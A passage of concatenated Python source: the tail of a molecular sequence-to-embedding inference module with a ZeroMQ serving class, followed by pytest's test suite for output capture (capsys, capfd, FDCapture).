seq = [s[0] for s in seq]
seq_list.extend(seq)
except StopIteration:
break
if (len(seq_list) == 1) & isinstance(seq_list, str):
return seq_list[0]
return seq_list
class InferenceModel(object):
"""Class that handles the inference of a trained model."""
def __init__(self, model_dir=_default_model_dir, use_gpu=True, batch_size=256,
gpu_mem_frac=0.1, beam_width=10, num_top=1, maximum_iterations=1000,
cpu_threads=5, emb_activation=None):
"""Constructor for the inference model.
Args:
model_dir: Path to the model directory.
use_gpu: Flag for GPU usage.
batch_size: Number of samples to process per step.
gpu_mem_frac: If GPU is used, what memory fraction should be used?
beam_width: Width of the the window used for the beam search decoder.
num_top: Number of most probable sequnces as output of the beam search decoder.
emb_activation: Activation function used in the bottleneck layer.
Returns:
None
"""
self.num_top = num_top
self.use_gpu = use_gpu
parser = argparse.ArgumentParser()
add_arguments(parser)
flags = parser.parse_args([])
flags.hparams_from_file = True
flags.save_dir = model_dir
download_model(model_dir)
self.hparams = create_hparams(flags)
self.hparams.set_hparam("save_dir", model_dir)
self.hparams.set_hparam("batch_size", batch_size)
self.hparams.set_hparam("gpu_mem_frac", gpu_mem_frac)
self.hparams.add_hparam("beam_width", beam_width)
self.hparams.set_hparam("cpu_threads", cpu_threads)
self.encode_model, self.decode_model = build_models(self.hparams,
modes=["ENCODE", "DECODE"])
self.maximum_iterations = maximum_iterations
def seq_to_emb(self, seq):
"""Helper function to calculate the embedding (molecular descriptor) for input sequnce(s)
Args:
seq: Single sequnces or list of sequnces to encode.
Returns:
Embedding of the input sequnce(s).
"""
if isinstance(seq, str):
seq = [seq]
if self.use_gpu:
emb = sequence2embedding(self.encode_model, self.hparams, seq)
else:
with tf.device("/cpu:0"):
emb = sequence2embedding(self.encode_model, self.hparams, seq)
return emb
def emb_to_seq(self, embedding):
"""Helper function to calculate the sequnce(s) for one or multiple (concatinated)
embedding.
Args:
embedding: array with n_samples x num_features.
Returns:
sequnce(s).
"""
if embedding.ndim == 1:
embedding = np.expand_dims(embedding, 0)
if self.use_gpu:
seq = embedding2sequence(self.decode_model, self.hparams, embedding, self.num_top, self.maximum_iterations)
else:
with tf.device("/cpu:0"):
seq = embedding2sequence(self.decode_model, self.hparams, embedding, self.num_top, self.maximum_iterations)
if len(seq) == 1:
seq = seq[0]
if len(seq) == 1:
seq = seq[0]
return seq
class InferenceServer():
def __init__(self, model_dir=_default_model_dir, num_servers=1, port_frontend="5559", port_backend="5560",
batch_size=256, gpu_mem_frac=0.3, beam_width=10, num_top=1, maximum_iterations=1000, use_running=False):
self.model_dir = model_dir
self.port_frontend = port_frontend
self.port_backend = port_backend
self.batch_size = batch_size
self.gpu_mem_frac = gpu_mem_frac
self.beam_width = beam_width
self.maximum_iterations = maximum_iterations
self.num_top = num_top
if not use_running:
self.gpus = os.environ.get('CUDA_VISIBLE_DEVICES').split(',')
mp.Process(target=self._init_device).start()
for i in range(num_servers):
os.environ['CUDA_VISIBLE_DEVICES'] = self.gpus[i%len(self.gpus)]
mp.Process(target=self._init_server).start()
def _init_device(self):
try:
context = zmq.Context(1)
# Socket facing clients
frontend = context.socket(zmq.XREP)
frontend.bind("tcp://*:%s" % self.port_frontend)
# Socket facing services
backend = context.socket(zmq.XREQ)
backend.bind("tcp://*:%s" % self.port_backend)
zmq.device(zmq.QUEUE, frontend, backend)
except:
print("bringing down zmq device")
finally:
pass
frontend.close()
backend.close()
context.term()
def _init_server(self):
infer_model = InferenceModel(
model_dir=self.model_dir,
gpu_mem_frac=self.gpu_mem_frac,
use_gpu=True,
batch_size=self.batch_size,
beam_width=self.beam_width,
maximum_iterations=self.maximum_iterations
)
context = zmq.Context()
socket = context.socket(zmq.REP)
socket.connect("tcp://localhost:%s" % self.port_backend)
print("Server running on GPU ", os.environ['CUDA_VISIBLE_DEVICES'])
while True:
inp = json.loads(socket.recv())
if inp[0]:
embeddings = infer_model.seq_to_emb(inp[1])
socket.send_string(json.dumps(embeddings.tolist()))
else:
smiles = infer_model.emb_to_seq(np.array(inp[1]))
socket.send_string(json.dumps(smiles))
def seq_to_emb(self, smiles):
context = zmq.Context()
socket = context.socket(zmq.REQ)
socket.connect("tcp://localhost:%s" % self.port_frontend)
socket.send_string(json.dumps((1, smiles)))
emb = np.array(json.loads(socket.recv()))
return emb
def emb_to_seq(self, emb):
context = zmq.Context()
socket = context.socket(zmq.REQ)
socket.connect("tcp://localhost:%s" % self.port_frontend)
socket.send_string(json.dumps((0, emb.tolist())))
emb = json.loads(socket.recv())
return emb
|
test_capture.py
|
from __future__ import absolute_import, division, print_function
# note: py.io capture tests where copied from
# pylib 1.4.20.dev2 (rev 13d9af95547e)
from __future__ import with_statement
import pickle
import os
import sys
from io import UnsupportedOperation
import _pytest._code
import py
import pytest
import contextlib
from _pytest import capture
from _pytest.capture import CaptureManager
from _pytest.main import EXIT_NOTESTSCOLLECTED
needsosdup = pytest.mark.xfail("not hasattr(os, 'dup')")
if sys.version_info >= (3, 0):
def tobytes(obj):
if isinstance(obj, str):
obj = obj.encode('UTF-8')
assert isinstance(obj, bytes)
return obj
def totext(obj):
if isinstance(obj, bytes):
obj = str(obj, 'UTF-8')
assert isinstance(obj, str)
return obj
else:
def tobytes(obj):
if isinstance(obj, unicode):
obj = obj.encode('UTF-8')
assert isinstance(obj, str)
return obj
def totext(obj):
if isinstance(obj, str):
obj = unicode(obj, 'UTF-8')
assert isinstance(obj, unicode)
return obj
def oswritebytes(fd, obj):
os.write(fd, tobytes(obj))
def StdCaptureFD(out=True, err=True, in_=True):
return capture.MultiCapture(out, err, in_, Capture=capture.FDCapture)
def StdCapture(out=True, err=True, in_=True):
return capture.MultiCapture(out, err, in_, Capture=capture.SysCapture)
class TestCaptureManager(object):
def test_getmethod_default_no_fd(self, monkeypatch):
from _pytest.capture import pytest_addoption
from _pytest.config import Parser
parser = Parser()
pytest_addoption(parser)
default = parser._groups[0].options[0].default
assert default == "fd" if hasattr(os, "dup") else "sys"
parser = Parser()
monkeypatch.delattr(os, 'dup', raising=False)
pytest_addoption(parser)
assert parser._groups[0].options[0].default == "sys"
@needsosdup
@pytest.mark.parametrize("method",
['no', 'sys', pytest.mark.skipif('not hasattr(os, "dup")', 'fd')])
def test_capturing_basic_api(self, method):
capouter = StdCaptureFD()
old = sys.stdout, sys.stderr, sys.stdin
try:
capman = CaptureManager(method)
capman.start_global_capturing()
outerr = capman.suspend_global_capture()
assert outerr == ("", "")
outerr = capman.suspend_global_capture()
assert outerr == ("", "")
print("hello")
out, err = capman.suspend_global_capture()
if method == "no":
assert old == (sys.stdout, sys.stderr, sys.stdin)
else:
assert not out
capman.resume_global_capture()
print("hello")
out, err = capman.suspend_global_capture()
if method != "no":
assert out == "hello\n"
capman.stop_global_capturing()
finally:
capouter.stop_capturing()
@needsosdup
def test_init_capturing(self):
capouter = StdCaptureFD()
try:
capman = CaptureManager("fd")
capman.start_global_capturing()
pytest.raises(AssertionError, "capman.start_global_capturing()")
capman.stop_global_capturing()
finally:
capouter.stop_capturing()
@pytest.mark.parametrize("method", ['fd', 'sys'])
def test_capturing_unicode(testdir, method):
if hasattr(sys, "pypy_version_info") and sys.pypy_version_info < (2, 2):
pytest.xfail("does not work on pypy < 2.2")
if sys.version_info >= (3, 0):
obj = "'b\u00f6y'"
else:
obj = "u'\u00f6y'"
testdir.makepyfile("""
# coding=utf8
# taken from issue 227 from nosetests
def test_unicode():
import sys
print (sys.stdout)
print (%s)
""" % obj)
result = testdir.runpytest("--capture=%s" % method)
result.stdout.fnmatch_lines([
"*1 passed*"
])
@pytest.mark.parametrize("method", ['fd', 'sys'])
def test_capturing_bytes_in_utf8_encoding(testdir, method):
testdir.makepyfile("""
def test_unicode():
print ('b\\u00f6y')
""")
result = testdir.runpytest("--capture=%s" % method)
result.stdout.fnmatch_lines([
"*1 passed*"
])
def test_collect_capturing(testdir):
p = testdir.makepyfile("""
print ("collect %s failure" % 13)
import xyz42123
""")
result = testdir.runpytest(p)
result.stdout.fnmatch_lines([
"*Captured stdout*",
"*collect 13 failure*",
])
class TestPerTestCapturing(object):
def test_capture_and_fixtures(self, testdir):
p = testdir.makepyfile("""
def setup_module(mod):
print ("setup module")
def setup_function(function):
print ("setup " + function.__name__)
def test_func1():
print ("in func1")
assert 0
def test_func2():
print ("in func2")
assert 0
""")
result = testdir.runpytest(p)
result.stdout.fnmatch_lines([
"setup module*",
"setup test_func1*",
"in func1*",
"setup test_func2*",
"in func2*",
])
@pytest.mark.xfail(reason="unimplemented feature")
def test_capture_scope_cache(self, testdir):
p = testdir.makepyfile("""
import sys
def setup_module(func):
print ("module-setup")
def setup_function(func):
print ("function-setup")
def test_func():
print ("in function")
assert 0
def teardown_function(func):
print ("in teardown")
""")
result = testdir.runpytest(p)
result.stdout.fnmatch_lines([
"*test_func():*",
"*Captured stdout during setup*",
"module-setup*",
"function-setup*",
"*Captured stdout*",
"in teardown*",
])
def test_no_carry_over(self, testdir):
p = testdir.makepyfile("""
def test_func1():
print ("in func1")
def test_func2():
print ("in func2")
assert 0
""")
result = testdir.runpytest(p)
s = result.stdout.str()
assert "in func1" not in s
assert "in func2" in s
def test_teardown_capturing(self, testdir):
p = testdir.makepyfile("""
def setup_function(function):
print ("setup func1")
def teardown_function(function):
print ("teardown func1")
assert 0
def test_func1():
print ("in func1")
pass
""")
result = testdir.runpytest(p)
result.stdout.fnmatch_lines([
'*teardown_function*',
'*Captured stdout*',
"setup func1*",
"in func1*",
"teardown func1*",
# "*1 fixture failure*"
])
def test_teardown_capturing_final(self, testdir):
p = testdir.makepyfile("""
def teardown_module(mod):
print ("teardown module")
assert 0
def test_func():
pass
""")
result = testdir.runpytest(p)
result.stdout.fnmatch_lines([
"*def teardown_module(mod):*",
"*Captured stdout*",
"*teardown module*",
"*1 error*",
])
def test_capturing_outerr(self, testdir):
p1 = testdir.makepyfile("""
import sys
def test_capturing():
print (42)
sys.stderr.write(str(23))
def test_capturing_error():
print (1)
sys.stderr.write(str(2))
raise ValueError
""")
result = testdir.runpytest(p1)
result.stdout.fnmatch_lines([
"*test_capturing_outerr.py .F*",
"====* FAILURES *====",
"____*____",
"*test_capturing_outerr.py:8: ValueError",
"*--- Captured stdout *call*",
"1",
"*--- Captured stderr *call*",
"2",
])
class TestLoggingInteraction(object):
def test_logging_stream_ownership(self, testdir):
p = testdir.makepyfile("""
def test_logging():
import logging
import pytest
stream = capture.CaptureIO()
logging.basicConfig(stream=stream)
stream.close() # to free memory/release resources
""")
result = testdir.runpytest_subprocess(p)
assert result.stderr.str().find("atexit") == -1
def test_logging_and_immediate_setupteardown(self, testdir):
p = testdir.makepyfile("""
import logging
def setup_function(function):
logging.warn("hello1")
def test_logging():
logging.warn("hello2")
assert 0
def teardown_function(function):
logging.warn("hello3")
assert 0
""")
for optargs in (('--capture=sys',), ('--capture=fd',)):
print(optargs)
result = testdir.runpytest_subprocess(p, *optargs)
s = result.stdout.str()
result.stdout.fnmatch_lines([
"*WARN*hello3", # errors show first!
"*WARN*hello1",
"*WARN*hello2",
])
# verify proper termination
assert "closed" not in s
def test_logging_and_crossscope_fixtures(self, testdir):
p = testdir.makepyfile("""
import logging
def setup_module(function):
logging.warn("hello1")
def test_logging():
logging.warn("hello2")
assert 0
def teardown_module(function):
logging.warn("hello3")
assert 0
""")
for optargs in (('--capture=sys',), ('--capture=fd',)):
print(optargs)
result = testdir.runpytest_subprocess(p, *optargs)
s = result.stdout.str()
result.stdout.fnmatch_lines([
"*WARN*hello3", # errors come first
"*WARN*hello1",
"*WARN*hello2",
])
# verify proper termination
assert "closed" not in s
def test_conftestlogging_is_shown(self, testdir):
testdir.makeconftest("""
import logging
logging.basicConfig()
logging.warn("hello435")
""")
# make sure that logging is still captured in tests
result = testdir.runpytest_subprocess("-s", "-p", "no:capturelog")
assert result.ret == EXIT_NOTESTSCOLLECTED
result.stderr.fnmatch_lines([
"WARNING*hello435*",
])
assert 'operation on closed file' not in result.stderr.str()
def test_conftestlogging_and_test_logging(self, testdir):
testdir.makeconftest("""
import logging
logging.basicConfig()
""")
# make sure that logging is still captured in tests
p = testdir.makepyfile("""
def test_hello():
import logging
logging.warn("hello433")
assert 0
""")
result = testdir.runpytest_subprocess(p, "-p", "no:capturelog")
assert result.ret != 0
result.stdout.fnmatch_lines([
"WARNING*hello433*",
])
assert 'something' not in result.stderr.str()
assert 'operation on closed file' not in result.stderr.str()
class TestCaptureFixture(object):
@pytest.mark.parametrize("opt", [[], ["-s"]])
def test_std_functional(self, testdir, opt):
reprec = testdir.inline_runsource("""
def test_hello(capsys):
print (42)
out, err = capsys.readouterr()
assert out.startswith("42")
""", *opt)
reprec.assertoutcome(passed=1)
def test_capsyscapfd(self, testdir):
p = testdir.makepyfile("""
def test_one(capsys, capfd):
pass
def test_two(capfd, capsys):
pass
""")
result = testdir.runpytest(p)
result.stdout.fnmatch_lines([
"*ERROR*setup*test_one*",
"E*capfd*capsys*same*time*",
"*ERROR*setup*test_two*",
"E*capsys*capfd*same*time*",
"*2 error*"])
def test_capturing_getfixturevalue(self, testdir):
"""Test that asking for "capfd" and "capsys" using request.getfixturevalue
in the same test is an error.
"""
testdir.makepyfile("""
def test_one(capsys, request):
request.getfixturevalue("capfd")
def test_two(capfd, request):
request.getfixturevalue("capsys")
""")
result = testdir.runpytest()
result.stdout.fnmatch_lines([
"*test_one*",
"*capsys*capfd*same*time*",
"*test_two*",
"*capfd*capsys*same*time*",
"*2 failed in*",
])
def test_capsyscapfdbinary(self, testdir):
p = testdir.makepyfile("""
def test_one(capsys, capfdbinary):
pass
""")
result = testdir.runpytest(p)
result.stdout.fnmatch_lines([
"*ERROR*setup*test_one*",
"E*capfdbinary*capsys*same*time*",
"*1 error*"])
@pytest.mark.parametrize("method", ["sys", "fd"])
def test_capture_is_represented_on_failure_issue128(self, testdir, method):
p = testdir.makepyfile("""
def test_hello(cap%s):
print ("xxx42xxx")
assert 0
""" % method)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines([
"xxx42xxx",
])
@needsosdup
def test_stdfd_functional(self, testdir):
reprec = testdir.inline_runsource("""
def test_hello(capfd):
import os
os.write(1, "42".encode('ascii'))
out, err = capfd.readouterr()
assert out.startswith("42")
capfd.close()
""")
reprec.assertoutcome(passed=1)
@needsosdup
def test_capfdbinary(self, testdir):
reprec = testdir.inline_runsource("""
def test_hello(capfdbinary):
import os
# some likely un-decodable bytes
os.write(1, b'\\xfe\\x98\\x20')
out, err = capfdbinary.readouterr()
assert out == b'\\xfe\\x98\\x20'
assert err == b''
""")
reprec.assertoutcome(passed=1)
@pytest.mark.skipif(
sys.version_info < (3,),
reason='only have capsysbinary in python 3',
)
def test_capsysbinary(self, testdir):
reprec = testdir.inline_runsource("""
def test_hello(capsysbinary):
import sys
# some likely un-decodable bytes
sys.stdout.buffer.write(b'\\xfe\\x98\\x20')
out, err = capsysbinary.readouterr()
assert out == b'\\xfe\\x98\\x20'
assert err == b''
""")
reprec.assertoutcome(passed=1)
@pytest.mark.skipif(
sys.version_info >= (3,),
reason='only have capsysbinary in python 3',
)
def test_capsysbinary_forbidden_in_python2(self, testdir):
testdir.makepyfile("""
def test_hello(capsysbinary):
pass
""")
result = testdir.runpytest()
result.stdout.fnmatch_lines([
"*test_hello*",
"*capsysbinary is only supported on python 3*",
"*1 error in*",
])
def test_partial_setup_failure(self, testdir):
p = testdir.makepyfile("""
def test_hello(capsys, missingarg):
pass
""")
result = testdir.runpytest(p)
result.stdout.fnmatch_lines([
"*test_partial_setup_failure*",
"*1 error*",
])
@needsosdup
def test_keyboardinterrupt_disables_capturing(self, testdir):
p = testdir.makepyfile("""
def test_hello(capfd):
import os
os.write(1, str(42).encode('ascii'))
raise KeyboardInterrupt()
""")
result = testdir.runpytest_subprocess(p)
result.stdout.fnmatch_lines([
"*KeyboardInterrupt*"
])
assert result.ret == 2
@pytest.mark.issue14
def test_capture_and_logging(self, testdir):
p = testdir.makepyfile("""
import logging
def test_log(capsys):
logging.error('x')
""")
result = testdir.runpytest_subprocess(p)
assert 'closed' not in result.stderr.str()
@pytest.mark.parametrize('fixture', ['capsys', 'capfd'])
@pytest.mark.parametrize('no_capture', [True, False])
def test_disabled_capture_fixture(self, testdir, fixture, no_capture):
testdir.makepyfile("""
def test_disabled({fixture}):
print('captured before')
with {fixture}.disabled():
print('while capture is disabled')
print('captured after')
assert {fixture}.readouterr() == ('captured before\\ncaptured after\\n', '')
def test_normal():
print('test_normal executed')
""".format(fixture=fixture))
args = ('-s',) if no_capture else ()
result = testdir.runpytest_subprocess(*args)
result.stdout.fnmatch_lines("""
*while capture is disabled*
""")
assert 'captured before' not in result.stdout.str()
assert 'captured after' not in result.stdout.str()
if no_capture:
assert 'test_normal executed' in result.stdout.str()
else:
assert 'test_normal executed' not in result.stdout.str()
@pytest.mark.parametrize('fixture', ['capsys', 'capfd'])
def test_fixture_use_by_other_fixtures(self, testdir, fixture):
"""
Ensure that capsys and capfd can be used by other fixtures during setup and teardown.
"""
testdir.makepyfile("""
from __future__ import print_function
import sys
import pytest
@pytest.fixture
def captured_print({fixture}):
print('stdout contents begin')
print('stderr contents begin', file=sys.stderr)
out, err = {fixture}.readouterr()
yield out, err
print('stdout contents end')
print('stderr contents end', file=sys.stderr)
out, err = {fixture}.readouterr()
assert out == 'stdout contents end\\n'
assert err == 'stderr contents end\\n'
def test_captured_print(captured_print):
out, err = captured_print
assert out == 'stdout contents begin\\n'
assert err == 'stderr contents begin\\n'
""".format(fixture=fixture))
result = testdir.runpytest_subprocess()
result.stdout.fnmatch_lines("*1 passed*")
assert 'stdout contents begin' not in result.stdout.str()
assert 'stderr contents begin' not in result.stdout.str()
def test_setup_failure_does_not_kill_capturing(testdir):
sub1 = testdir.mkpydir("sub1")
sub1.join("conftest.py").write(_pytest._code.Source("""
def pytest_runtest_setup(item):
raise ValueError(42)
"""))
sub1.join("test_mod.py").write("def test_func1(): pass")
result = testdir.runpytest(testdir.tmpdir, '--traceconfig')
result.stdout.fnmatch_lines([
"*ValueError(42)*",
"*1 error*"
])
def test_fdfuncarg_skips_on_no_osdup(testdir):
testdir.makepyfile("""
import os
if hasattr(os, 'dup'):
del os.dup
def test_hello(capfd):
pass
""")
result = testdir.runpytest_subprocess("--capture=no")
result.stdout.fnmatch_lines([
"*1 skipped*"
])
def test_capture_conftest_runtest_setup(testdir):
testdir.makeconftest("""
def pytest_runtest_setup():
print ("hello19")
""")
testdir.makepyfile("def test_func(): pass")
result = testdir.runpytest()
assert result.ret == 0
assert 'hello19' not in result.stdout.str()
def test_capture_badoutput_issue412(testdir):
testdir.makepyfile("""
import os
def test_func():
omg = bytearray([1,129,1])
os.write(1, omg)
assert 0
""")
result = testdir.runpytest('--cap=fd')
result.stdout.fnmatch_lines('''
*def test_func*
*assert 0*
*Captured*
*1 failed*
''')
def test_capture_early_option_parsing(testdir):
testdir.makeconftest("""
def pytest_runtest_setup():
print ("hello19")
""")
testdir.makepyfile("def test_func(): pass")
result = testdir.runpytest("-vs")
assert result.ret == 0
assert 'hello19' in result.stdout.str()
def test_capture_binary_output(testdir):
testdir.makepyfile(r"""
import pytest
def test_a():
import sys
import subprocess
subprocess.call([sys.executable, __file__])
def test_foo():
import os;os.write(1, b'\xc3')
if __name__ == '__main__':
test_foo()
""")
result = testdir.runpytest('--assert=plain')
result.assert_outcomes(passed=2)
def test_error_during_readouterr(testdir):
"""Make sure we suspend capturing if errors occur during readouterr"""
testdir.makepyfile(pytest_xyz="""
from _pytest.capture import FDCapture
def bad_snap(self):
raise Exception('boom')
assert FDCapture.snap
FDCapture.snap = bad_snap
""")
result = testdir.runpytest_subprocess(
"-p", "pytest_xyz", "--version", syspathinsert=True
)
result.stderr.fnmatch_lines([
"*in bad_snap",
" raise Exception('boom')",
"Exception: boom",
])
class TestCaptureIO(object):
def test_text(self):
f = capture.CaptureIO()
f.write("hello")
s = f.getvalue()
assert s == "hello"
f.close()
def test_unicode_and_str_mixture(self):
f = capture.CaptureIO()
if sys.version_info >= (3, 0):
f.write("\u00f6")
pytest.raises(TypeError, "f.write(bytes('hello', 'UTF-8'))")
else:
f.write(unicode("\u00f6", 'UTF-8'))
f.write("hello") # bytes
s = f.getvalue()
f.close()
assert isinstance(s, unicode)
@pytest.mark.skipif(
sys.version_info[0] == 2,
reason='python 3 only behaviour',
)
def test_write_bytes_to_buffer(self):
"""In python3, stdout / stderr are text io wrappers (exposing a buffer
property of the underlying bytestream). See issue #1407
"""
f = capture.CaptureIO()
f.buffer.write(b'foo\r\n')
assert f.getvalue() == 'foo\r\n'
def test_bytes_io():
f = py.io.BytesIO()
f.write(tobytes("hello"))
pytest.raises(TypeError, "f.write(totext('hello'))")
s = f.getvalue()
assert s == tobytes("hello")
def test_dontreadfrominput():
from _pytest.capture import DontReadFromInput
f = DontReadFromInput()
assert not f.isatty()
pytest.raises(IOError, f.read)
pytest.raises(IOError, f.readlines)
pytest.raises(IOError, iter, f)
pytest.raises(UnsupportedOperation, f.fileno)
f.close() # just for completeness
@pytest.mark.skipif('sys.version_info < (3,)', reason='python2 has no buffer')
def test_dontreadfrominput_buffer_python3():
from _pytest.capture import DontReadFromInput
f = DontReadFromInput()
fb = f.buffer
assert not fb.isatty()
pytest.raises(IOError, fb.read)
pytest.raises(IOError, fb.readlines)
pytest.raises(IOError, iter, fb)
pytest.raises(ValueError, fb.fileno)
f.close() # just for completeness
@pytest.mark.skipif('sys.version_info >= (3,)', reason='python2 has no buffer')
def test_dontreadfrominput_buffer_python2():
from _pytest.capture import DontReadFromInput
f = DontReadFromInput()
with pytest.raises(AttributeError):
f.buffer
f.close() # just for completeness
@pytest.yield_fixture
def tmpfile(testdir):
f = testdir.makepyfile("").open('wb+')
yield f
if not f.closed:
f.close()
@needsosdup
def test_dupfile(tmpfile):
flist = []
for i in range(5):
nf = capture.safe_text_dupfile(tmpfile, "wb")
assert nf != tmpfile
assert nf.fileno() != tmpfile.fileno()
assert nf not in flist
print(i, end="", file=nf)
flist.append(nf)
fname_open = flist[0].name
assert fname_open == repr(flist[0].buffer)
for i in range(5):
f = flist[i]
f.close()
fname_closed = flist[0].name
assert fname_closed == repr(flist[0].buffer)
assert fname_closed != fname_open
tmpfile.seek(0)
s = tmpfile.read()
assert "01234" in repr(s)
tmpfile.close()
assert fname_closed == repr(flist[0].buffer)
def test_dupfile_on_bytesio():
io = py.io.BytesIO()
f = capture.safe_text_dupfile(io, "wb")
f.write("hello")
assert io.getvalue() == b"hello"
assert 'BytesIO object' in f.name
def test_dupfile_on_textio():
io = py.io.TextIO()
f = capture.safe_text_dupfile(io, "wb")
f.write("hello")
assert io.getvalue() == "hello"
assert not hasattr(f, 'name')
@contextlib.contextmanager
def lsof_check():
pid = os.getpid()
try:
out = py.process.cmdexec("lsof -p %d" % pid)
except (py.process.cmdexec.Error, UnicodeDecodeError):
# about UnicodeDecodeError, see note on pytester
pytest.skip("could not run 'lsof'")
yield
out2 = py.process.cmdexec("lsof -p %d" % pid)
len1 = len([x for x in out.split("\n") if "REG" in x])
len2 = len([x for x in out2.split("\n") if "REG" in x])
assert len2 < len1 + 3, out2
class TestFDCapture(object):
pytestmark = needsosdup
def test_simple(self, tmpfile):
fd = tmpfile.fileno()
cap = capture.FDCapture(fd)
data = tobytes("hello")
os.write(fd, data)
s = cap.snap()
cap.done()
assert not s
cap = capture.FDCapture(fd)
cap.start()
os.write(fd, data)
s = cap.snap()
cap.done()
assert s == "hello"
def test_simple_many(self, tmpfile):
for i in range(10):
self.test_simple(tmpfile)
def test_simple_many_check_open_files(self, testdir):
with lsof_check():
with testdir.makepyfile("").open('wb+') as tmpfile:
self.test_simple_many(tmpfile)
def test_simple_fail_second_start(self, tmpfile):
fd = tmpfile.fileno()
cap = capture.FDCapture(fd)
cap.done()
pytest.raises(ValueError, cap.start)
def test_stderr(self):
cap = capture.FDCapture(2)
cap.start()
print("hello", file=sys.stderr)
s = cap.snap()
cap.done()
assert s == "hello\n"
def test_stdin(self, tmpfile):
cap = capture.FDCapture(0)
cap.start()
x = os.read(0, 100).strip()
cap.done()
assert x == tobytes('')
def test_writeorg(self, tmpfile):
data1, data2 = tobytes("foo"), tobytes("bar")
cap = capture.FDCapture(tmpfile.fileno())
cap.start()
tmpfile.write(data1)
tmpfile.flush()
cap.writeorg(data2)
scap = cap.snap()
cap.done()
assert scap == totext(data1)
with open(tmpfile.name, 'rb') as stmp_file:
stmp = stmp_file.read()
assert stmp == data2
def test_simple_resume_suspend(self, tmpfile):
with saved_fd(1):
cap = capture.FDCapture(1)
cap.start()
data = tobytes("hello")
os.write(1, data)
sys.stdout.write("whatever")
s = cap.snap()
assert s == "hellowhatever"
cap.suspend()
os.write(1, tobytes("world"))
sys.stdout.write("qlwkej")
assert not cap.snap()
cap.resume()
os.write(1, tobytes("but now"))
sys.stdout.write(" yes\n")
s = cap.snap()
assert s == "but now yes\n"
cap.suspend()
cap.done()
pytest.raises(AttributeError, cap.suspend)
@contextlib.contextmanager
def saved_fd(fd):
new_fd = os.dup(fd)
try:
yield
finally:
os.dup2(new_fd, fd)
os.close(new_fd)
class TestStdCapture(object):
captureclass = staticmethod(StdCapture)
@contextlib.contextmanager
def getcapture(self, **kw):
cap = self.__class__.captureclass(**kw)
cap.start_capturing()
try:
yield cap
finally:
cap.stop_capturing()
def test_capturing_done_simple(self):
with self.getcapture() as cap:
sys.stdout.write("hello")
sys.stderr.write("world")
out, err = cap.readouterr()
assert out == "hello"
assert err == "world"
def test_capturing_reset_simple(self):
with self.getcapture() as cap:
print("hello world")
sys.stderr.write("hello error\n")
out, err = cap.readouterr()
assert out == "hello world\n"
assert err == "hello error\n"
def test_capturing_readouterr(self):
with self.getcapture() as cap:
print("hello world")
sys.stderr.write("hello error\n")
out, err = cap.readouterr()
assert out == "hello world\n"
assert err == "hello error\n"
sys.stderr.write("error2")
out, err = cap.readouterr()
assert err == "error2"
def test_capture_results_accessible_by_attribute(self):
with self.getcapture() as cap:
sys.stdout.write("hello")
sys.stderr.write("world")
capture_result = cap.readouterr()
assert capture_result.out == "hello"
assert capture_result.err == "world"
def test_capturing_readouterr_unicode(self):
with self.getcapture() as cap:
print("hx\xc4\x85\xc4\x87")
out, err = cap.readouterr()
assert out == py.builtin._totext("hx\xc4\x85\xc4\x87\n", "utf8")
@pytest.mark.skipif('sys.version_info >= (3,)',
reason='text output different for bytes on python3')
def test_capturing_readouterr_decode_error_handling(self):
with self.getcapture() as cap:
# triggered a internal error in pytest
print('\xa6')
out, err = cap.readouterr()
assert out == py.builtin._totext('\ufffd\n', 'unicode-escape')
def test_reset_twice_error(self):
with self.getcapture() as cap:
print("hello")
out, err = cap.readouterr()
pytest.raises(ValueError, cap.stop_capturing)
assert out == "hello\n"
assert not err
def test_capturing_modify_sysouterr_in_between(self):
oldout = sys.stdout
olderr = sys.stderr
with self.getcapture() as cap:
sys.stdout.write("hello")
sys.stderr.write("world")
sys.stdout = capture.CaptureIO()
sys.stderr = capture.CaptureIO()
print("not seen")
sys.stderr.write("not seen\n")
out, err = cap.readouterr()
assert out == "hello"
assert err == "world"
assert sys.stdout == oldout
assert sys.stderr == olderr
def test_capturing_error_recursive(self):
with self.getcapture() as cap1:
print("cap1")
with self.getcapture() as cap2:
print("cap2")
out2, err2 = cap2.readouterr()
out1, err1 = cap1.readouterr()
assert out1 == "cap1\n"
assert out2 == "cap2\n"
def test_just_out_capture(self):
with self.getcapture(out=True, err=False) as cap:
sys.stdout.write("hello")
sys.stderr.write("world")
out, err = cap.readouterr()
assert out == "hello"
assert not err
def test_just_err_capture(self):
with self.getcapture(out=False, err=True) as cap:
sys.stdout.write("hello")
sys.stderr.write("world")
out, err = cap.readouterr()
assert err == "world"
assert not out
def test_stdin_restored(self):
old = sys.stdin
with self.getcapture(in_=True):
newstdin = sys.stdin
assert newstdin != sys.stdin
assert sys.stdin is old
def test_stdin_nulled_by_default(self):
print("XXX this test may well hang instead of crashing")
print("XXX which indicates an error in the underlying capturing")
print("XXX mechanisms")
with self.getcapture():
pytest.raises(IOError, "sys.stdin.read()")
class TestStdCaptureFD(TestStdCapture):
pytestmark = needsosdup
captureclass = staticmethod(StdCaptureFD)
def test_simple_only_fd(self, testdir):
testdir.makepyfile("""
import os
def test_x():
os.write(1, "hello\\n".encode("ascii"))
assert 0
""")
result = testdir.runpytest_subprocess()
result.stdout.fnmatch_lines("""
*test_x*
*assert 0*
*Captured stdout*
""")
def test_intermingling(self):
with self.getcapture() as cap:
oswritebytes(1, "1")
sys.stdout.write(str(2))
sys.stdout.flush()
oswritebytes(1, "3")
oswritebytes(2, "a")
sys.stderr.write("b")
sys.stderr.flush()
oswritebytes(2, "c")
out, err = cap.readouterr()
assert out == "123"
assert err == "abc"
def test_many(self, capfd):
with lsof_check():
for i in range(10):
cap = StdCaptureFD()
cap.stop_capturing()
class TestStdCaptureFDinvalidFD(object):
pytestmark = needsosdup
def test_stdcapture_fd_invalid_fd(self, testdir):
testdir.makepyfile("""
import os
from _pytest import capture
def StdCaptureFD(out=True, err=True, in_=True):
return capture.MultiCapture(out, err, in_,
Capture=capture.FDCapture)
def test_stdout():
os.close(1)
cap = StdCaptureFD(out=True, err=False, in_=False)
cap.stop_capturing()
def test_stderr():
os.close(2)
cap = StdCaptureFD(out=False, err=True, in_=False)
cap.stop_capturing()
def test_stdin():
os.close(0)
cap = StdCaptureFD(out=False, err=False, in_=True)
cap.stop_capturing()
""")
result = testdir.runpytest_subprocess("--capture=fd")
assert result.ret == 0
assert result.parseoutcomes()['passed'] == 3
def test_capture_not_started_but_reset():
capsys = StdCapture()
capsys.stop_capturing()
def test_using_capsys_fixture_works_with_sys_stdout_encoding(capsys):
test_text = 'test text'
print(test_text.encode(sys.stdout.encoding, 'replace'))
(out, err) = capsys.readouterr()
